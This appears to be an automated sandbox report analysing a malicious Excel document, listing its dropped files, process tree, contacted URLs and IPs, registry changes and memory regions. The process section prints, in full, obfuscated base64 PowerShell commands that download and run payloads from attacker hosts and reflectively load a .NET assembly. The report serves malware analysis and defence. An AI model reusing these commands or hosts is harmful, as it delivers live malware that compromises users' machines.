Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
PI-02911202409#.xla.xlsx
|
Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Name of Creating Application:
Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Mon Dec 2 01:58:26 2024, Security: 1
|
initial sample
|
 |
|
|
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\seemebestgoodluckthings[1].hta
|
HTML document, ASCII text, with very long lines (65536), with no line terminators
|
modified
|
|
|
|
C:\Users\user\AppData\Local\Temp\akgiliwf\akgiliwf.cmdline
|
Unicode text, UTF-8 (with BOM) text, with very long lines (366), with no line terminators
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\seemebestthingsentirelifegivenbac.vbS
|
Unicode text, UTF-16, little-endian text, with very long lines (3250), with CRLF line terminators
|
dropped
|
|
|
|
C:\Users\user\Desktop\~$PI-02911202409#.xla.xlsx
|
data
|
modified
|
|
|
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\seemebestthingsentirelifegivenbackwithgood[1].tiff
|
Unicode text, UTF-16, little-endian text, with very long lines (3250), with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\2D1157F7.emf
|
Windows Enhanced Metafile (EMF) image data version 0x10000
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\4694F341.emf
|
Windows Enhanced Metafile (EMF) image data version 0x10000
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\AFD5404E.emf
|
Windows Enhanced Metafile (EMF) image data version 0x10000
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\DC3D3040.emf
|
Windows Enhanced Metafile (EMF) image data version 0x10000
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\35g0sohe.lji.psm1
|
very short file (no magic)
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\RES2DE4.tmp
|
Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48a, 9 symbols, created Mon Dec 2 06:29:00 2024,
1st section name ".debug$S"
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\akgiliwf\CSC107B8B87724F4FE1A74D28EF2C06A4.TMP
|
MSVC .res
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\akgiliwf\akgiliwf.0.cs
|
C++ source, Unicode text, UTF-8 (with BOM) text, with very long lines (355)
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\akgiliwf\akgiliwf.dll
|
PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\akgiliwf\akgiliwf.out
|
Unicode text, UTF-8 (with BOM) text, with very long lines (445), with CRLF, CR line terminators
|
modified
|
||
|
C:\Users\user\AppData\Local\Temp\g0d4btaf.apa.ps1
|
very short file (no magic)
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\hlhaxm2c.jzx.ps1
|
very short file (no magic)
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\r031ds22.voi.psm1
|
very short file (no magic)
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\~DFA156C90EDF9BD946.TMP
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\~DFBBD83558A015EB55.TMP
|
data
|
dropped
|
||
|
C:\Users\user\Desktop\50A30000
|
Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Name of Creating Application:
Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Mon Dec 2 06:29:08 2024, Security: 1
|
dropped
|
||
|
C:\Users\user\Desktop\50A30000:Zone.Identifier
|
ASCII text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\Desktop\PI-02911202409#.xla.xls (copy)
|
Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Name of Creating Application:
Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Mon Dec 2 06:29:08 2024, Security: 1
|
dropped
|
There are 16 hidden files, click here to show them.
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
|
"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
|
|
|
|
C:\Windows\System32\mshta.exe
|
C:\Windows\System32\mshta.exe -Embedding
|
|
|
|
C:\Windows\System32\cmd.exe
|
"C:\Windows\system32\cmd.exe" "/c pOwErSHelL.exE -ex BYpASS
-NOp -w 1 -C
dEVICeCreDENtialDePLOYMENT ; iNVOkE-eXPREsSioN($(InvOKE-EXpReSSiON('[syStEM.TeXT.eNCODiNG]'+[CHaR]0X3A+[chAr]0x3A+'utf8.geTstrINg([SYSTem.CoNverT]'+[CHar]0X3A+[ChAr]0x3A+'fRoMbASE64sTriNG('+[ChAr]34+'JFFwa0tZNkUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFEZC10WXBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVtQmVSZGVmaU5JdGlvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVyTG1vbi5kTEwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSlF6LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgemMsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBUV2lKbWZpekcsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcE1qdXRlSyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGhHSWR3ZngpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiYUFpTXpoIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTUVTcEFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSG1QTWMgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRRcGtLWTZFOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTcyLjI0NS4xMjMuMTIvMzYxL3NlZW1lYmVzdHRoaW5nc2VudGlyZWxpZmVnaXZlbmJhY2t3aXRoZ29vZC50SUYiLCIkZW52OkFQUERBVEFcc2VlbWViZXN0dGhpbmdzZW50aXJlbGlmZWdpdmVuYmFjLnZiUyIsMCwwKTtTVEFydC1zTEVFcCgzKTtJaSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFTlY6QVBQREFUQVxzZWVtZWJlc3R0aGluZ3NlbnRpcmVsaWZlZ2l2ZW5iYWMudmJTIg=='+[chaR]34+'))')))"
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
pOwErSHelL.exE -ex BYpASS -NOp
-w 1 -C dEVICeCreDENtialDePLOYMENT
; iNVOkE-eXPREsSioN($(InvOKE-EXpReSSiON('[syStEM.TeXT.eNCODiNG]'+[CHaR]0X3A+[chAr]0x3A+'utf8.geTstrINg([SYSTem.CoNverT]'+[CHar]0X3A+[ChAr]0x3A+'fRoMbASE64sTriNG('+[ChAr]34+'JFFwa0tZNkUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFEZC10WXBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVtQmVSZGVmaU5JdGlvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVyTG1vbi5kTEwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSlF6LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgemMsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBUV2lKbWZpekcsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcE1qdXRlSyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGhHSWR3ZngpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiYUFpTXpoIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTUVTcEFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSG1QTWMgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRRcGtLWTZFOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTcyLjI0NS4xMjMuMTIvMzYxL3NlZW1lYmVzdHRoaW5nc2VudGlyZWxpZmVnaXZlbmJhY2t3aXRoZ29vZC50SUYiLCIkZW52OkFQUERBVEFcc2VlbWViZXN0dGhpbmdzZW50aXJlbGlmZWdpdmVuYmFjLnZiUyIsMCwwKTtTVEFydC1zTEVFcCgzKTtJaSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFTlY6QVBQREFUQVxzZWVtZWJlc3R0aGluZ3NlbnRpcmVsaWZlZ2l2ZW5iYWMudmJTIg=='+[chaR]34+'))')))"
|
|
|
|
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
|
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\akgiliwf\akgiliwf.cmdline"
|
|
|
|
C:\Windows\System32\wscript.exe
|
"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seemebestthingsentirelifegivenbac.vbS"
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $alastrar = 'JGVzdHJlbGVqYXIgPSAnaHR0cHM6Ly8xMDE2LmZpbGVtYWlsLmNvbS9hcGkvZmlsZS9nZXQ/ZmlsZWtleT1IVFVHX0V5cnVEUjBPQVpIMEhISnllcFVyWFN2Rl9pNmo4YndlVGVXQkN1MTl4Y2JqUU41VGtzYTRPRzBNcWNjcVdOTGxnJnBrX3ZpZD1lMDEwOTYzOGM5YmZiOTU3MTczMjc5NDM1NmExZmY2YyAnOyRhbWJpZ3VpZGFkZSA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7JGVudHJhZGFuaGEgPSAkYW1iaWd1aWRhZGUuRG93bmxvYWREYXRhKCRlc3RyZWxlamFyKTskYm9ybmVjbyA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKCRlbnRyYWRhbmhhKTskbGlxdWlkaWZpY2FyID0gJzw8QkFTRTY0X1NUQVJUPj4nOyRwaW50b3JhID0gJzw8QkFTRTY0X0VORD4+JzskY2hvdXZpciA9ICRib3JuZWNvLkluZGV4T2YoJGxpcXVpZGlmaWNhcik7JGltbWVyZ2lyID0gJGJvcm5lY28uSW5kZXhPZigkcGludG9yYSk7JGNob3V2aXIgLWdlIDAgLWFuZCAkaW1tZXJnaXIgLWd0ICRjaG91dmlyOyRjaG91dmlyICs9ICRsaXF1aWRpZmljYXIuTGVuZ3RoOyRmcnV0aWZpY2FyID0gJGltbWVyZ2lyIC0gJGNob3V2aXI7JGJ1c3NvbGNvID0gJGJvcm5lY28uU3Vic3RyaW5nKCRjaG91dmlyLCAkZnJ1dGlmaWNhcik7JHF1aW5pY2EgPSAtam9pbiAoJGJ1c3NvbGNvLlRvQ2hhckFycmF5KCkgfCBGb3JFYWNoLU9iamVjdCB7ICRfIH0pWy0xLi4tKCRidXNzb2xjby5MZW5ndGgpXTskYmVpcmFtZSA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJHF1aW5pY2EpOyRzYWlkb3IgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCRiZWlyYW1lKTskZW5nb3JkdXJhciA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoJ1ZBSScpOyRlbmdvcmR1cmFyLkludm9rZSgkbnVsbCwgQCgndHh0LkFSRU5MRVQvMTYzLzIxLjMyMS41NDIuMjcxLy86cHR0aCcsICckZGFkYW5lJywgJyRkYWRhbmUnLCAnJGRhZGFuZScsICdhc3BuZXRfY29tcGlsZXInLCAnJGRhZGFuZScsICckZGFkYW5lJywnJGRhZGFuZScsJyRkYWRhbmUnLCckZGFkYW5lJywnJGRhZGFuZScsJyRkYWRhbmUnLCcxJywnJGRhZGFuZScpKTs=';$morfose
= [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($alastrar));Invoke-Expression $morfose
|
|
|
|
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
|
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
|
|
|
|
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
|
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES2DE4.tmp"
"c:\Users\user\AppData\Local\Temp\akgiliwf\CSC107B8B87724F4FE1A74D28EF2C06A4.TMP"
|
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
http://172.245.123.12/361/TELNERA.txt
|
172.245.123.12
|
|
|
|
http://172.245.123.12/361/seemebestthingsentirelifegivenbackwithgood.tIF
|
172.245.123.12
|
|
|
|
http://172.245.123.12/361/sen/seemebestgoodluckthings.hta
|
172.245.123.12
|
|
|
|
https://1016.filemail.com/api/file/get?filekey=HTUG_EyruDR0OAZH0HHJyepUrXSvF_i6j8bweTeWBCu19xcbjQN5Tksa4OG0MqccqWNLlg&pk_vid=e0109638c9bfb9571732794356a1ff6c
|
142.215.209.77
|
|
|
|
http://172.245.123.12/361/sen/seemebestgoodluckthings.htahttp://172.245.123.12/361/sen/seemebestgood
|
unknown
|
||
|
http://nuget.org/NuGet.exe
|
unknown
|
||
|
https://linkjago.me/fhq3w8?&pupil=gigantic&antechamber=substantial&rub=quick&sideboard=divergent&pet
|
unknown
|
||
|
http://crl.entrust.net/server1.crl0
|
unknown
|
||
|
http://ocsp.entrust.net03
|
unknown
|
||
|
http://172.245.123.12/361/sen/seemebestgoodluckthings.htau
|
unknown
|
||
|
https://contoso.com/License
|
unknown
|
||
|
https://contoso.com/Icon
|
unknown
|
||
|
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
|
unknown
|
||
|
https://1016.filemail.com
|
unknown
|
||
|
http://www.diginotar.nl/cps/pkioverheid0
|
unknown
|
||
|
http://172.245.123.12/361/sen/seemebestgoodluckthings.htaM
|
unknown
|
||
|
https://linkjago.me/c
|
unknown
|
||
|
http://go.micros
|
unknown
|
||
|
http://172.245.123.12/361/seemebestthingsentirelifegivenbackwithgood.tIFp
|
unknown
|
||
|
https://1016.filemail.com/api/file/get?filekey=HTUG_EyruDR0OAZH0HHJyepUrXSvF_i6j8bweTeWBCu19xcbjQN5T
|
unknown
|
||
|
http://172.245.123.12/361/sen/seemebestgoodluckthings.htaE
|
unknown
|
||
|
https://linkjago.me/fhq3w8?&pupil=gigantic&antechamber=substantial&rub=quick&sideboard=divergent&petticoat
|
188.114.97.6
|
||
|
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
|
unknown
|
||
|
http://172.245.123.12/361/seemebestthingsentirelifegivenbackwithgood.tIF89
|
unknown
|
||
|
http://172.245.123.12/361/sen/seemebestgoodluckthings.htaC:
|
unknown
|
||
|
http://172.245.123.12/361/seemeb
|
unknown
|
||
|
https://linkjago.me/
|
unknown
|
||
|
http://172.245.123.12/nt=5&recv=
|
unknown
|
||
|
http://172.245.123.12/361/sen/seemebestgoodluckthings.htastantial&rub=quick&sideboard=divergent&pett
|
unknown
|
||
|
http://172.245.123.12/
|
unknown
|
||
|
https://contoso.com/
|
unknown
|
||
|
https://nuget.org/nuget.exe
|
unknown
|
||
|
http://172.245.123.12/361/sen/seemebestgoodluckthings.htaU
|
unknown
|
||
|
http://172.245.123.12/361/sen/seemebestgoodluckthings.htatial&rub=quick&sideboa
|
unknown
|
||
|
http://172.245.123.12/361/sen/seemebestgoodluckthings.hta-
|
unknown
|
||
|
http://ocsp.entrust.net0D
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
|
https://secure.comodo.com/CPS0
|
unknown
|
||
|
http://crl.entrust.net/2048ca.crl0
|
unknown
|
||
|
http://172.245.123.12/361/sen/seemebestgoodluckthings.hta6X1
|
unknown
|
||
|
http://172.245.123.12/361/sen/seemebestgoodluckthings.htae
|
unknown
|
There are 31 hidden URLs, click here to show them.
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
ip.1016.filemail.com
|
142.215.209.77
|
|
|
|
linkjago.me
|
188.114.97.6
|
||
|
1016.filemail.com
|
unknown
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
142.215.209.77
|
ip.1016.filemail.com
|
Canada
|
|
|
|
172.245.123.12
|
unknown
|
United States
|
|
|
|
188.114.97.6
|
linkjago.me
|
European Union
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C
|
Blob
|
|
|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C
|
Blob
|
|
|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C
|
Blob
|
|
|
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
|
oa/
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
|
2060
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
|
1036
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Outlook\Journaling\Microsoft Excel
|
Enabled
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel
|
MTTT
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\ReviewCycle
|
ReviewToken
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
|
=f/
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Security\Trusted Documents
|
LastPurgeTime
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Place MRU
|
Max Display
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Max Display
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 1
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 2
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 3
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 4
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 5
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 6
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 7
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 8
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 9
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 10
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 11
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 12
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 13
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 14
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 15
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 16
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 17
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 18
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 19
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 20
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\3A209
|
3A209
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
|
1033
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
|
1033
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
|
EXCELFiles
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
|
ProductFiles
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
|
VBAFiles
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
|
SavedLegacySettings
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
|
Blob
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
|
Blob
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
|
Blob
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
|
Blob
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
|
Blob
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
|
SavedLegacySettings
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
|
SavedLegacySettings
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileDirectory
|
There are 49 hidden registries, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
150000
|
direct allocation
|
page read and write
|
|
|
|
400000
|
remote allocation
|
page execute and read and write
|
|
|
|
25A000
|
heap
|
page read and write
|
||
|
4F18000
|
heap
|
page read and write
|
||
|
388000
|
heap
|
page read and write
|
||
|
5A0000
|
heap
|
page read and write
|
||
|
7FE89BA0000
|
trusted library allocation
|
page read and write
|
||
|
1BC4000
|
heap
|
page read and write
|
||
|
6D0000
|
heap
|
page read and write
|
||
|
122000
|
heap
|
page read and write
|
||
|
4EDA000
|
heap
|
page read and write
|
||
|
3825000
|
heap
|
page read and write
|
||
|
3857000
|
heap
|
page read and write
|
||
|
4F0B000
|
heap
|
page read and write
|
||
|
468000
|
heap
|
page read and write
|
||
|
3BB000
|
heap
|
page read and write
|
||
|
3842000
|
heap
|
page read and write
|
||
|
4F0E000
|
heap
|
page read and write
|
||
|
CF7000
|
direct allocation
|
page execute and read and write
|
||
|
A70000
|
direct allocation
|
page execute and read and write
|
||
|
22D2000
|
trusted library allocation
|
page read and write
|
||
|
4EE000
|
heap
|
page read and write
|
||
|
1C1A2000
|
heap
|
page read and write
|
||
|
396000
|
heap
|
page read and write
|
||
|
4A1000
|
heap
|
page read and write
|
||
|
3F8000
|
heap
|
page read and write
|
||
|
367000
|
heap
|
page read and write
|
||
|
37B1000
|
heap
|
page read and write
|
||
|
B80000
|
direct allocation
|
page execute and read and write
|
||
|
7FFFFF20000
|
trusted library allocation
|
page execute and read and write
|
||
|
4A55000
|
heap
|
page read and write
|
||
|
4F12000
|
heap
|
page read and write
|
||
|
3897000
|
heap
|
page read and write
|
||
|
CF1000
|
direct allocation
|
page execute and read and write
|
||
|
4F0D000
|
heap
|
page read and write
|
||
|
2B90000
|
heap
|
page read and write
|
||
|
4530000
|
heap
|
page read and write
|
||
|
1C2BF000
|
stack
|
page read and write
|
||
|
4F12000
|
heap
|
page read and write
|
||
|
3C0000
|
heap
|
page read and write
|
||
|
2B95000
|
heap
|
page read and write
|
||
|
40BF000
|
stack
|
page read and write
|
||
|
1FC4000
|
heap
|
page read and write
|
||
|
1C179000
|
heap
|
page read and write
|
||
|
7FE89A40000
|
trusted library allocation
|
page execute and read and write
|
||
|
46F000
|
heap
|
page read and write
|
||
|
4F1B000
|
heap
|
page read and write
|
||
|
56C1000
|
trusted library allocation
|
page read and write
|
||
|
620000
|
direct allocation
|
page read and write
|
||
|
2200000
|
heap
|
page execute and read and write
|
||
|
3E89000
|
trusted library allocation
|
page read and write
|
||
|
7FE89966000
|
trusted library allocation
|
page execute and read and write
|
||
|
4AFD000
|
heap
|
page read and write
|
||
|
1F7000
|
heap
|
page read and write
|
||
|
3869000
|
heap
|
page read and write
|
||
|
1AE3E000
|
stack
|
page read and write
|
||
|
37D7000
|
heap
|
page read and write
|
||
|
3C4000
|
heap
|
page read and write
|
||
|
4F23000
|
heap
|
page read and write
|
||
|
7FE89B70000
|
trusted library allocation
|
page read and write
|
||
|
49E1000
|
heap
|
page read and write
|
||
|
39E000
|
heap
|
page read and write
|
||
|
14E000
|
heap
|
page read and write
|
||
|
4F23000
|
heap
|
page read and write
|
||
|
1A8D0000
|
heap
|
page read and write
|
||
|
4EDD000
|
heap
|
page read and write
|
||
|
3335000
|
trusted library allocation
|
page read and write
|
||
|
3D00000
|
trusted library allocation
|
page read and write
|
||
|
3AD7000
|
trusted library allocation
|
page read and write
|
||
|
1FD0000
|
trusted library allocation
|
page read and write
|
||
|
473000
|
heap
|
page read and write
|
||
|
1A7EB000
|
heap
|
page read and write
|
||
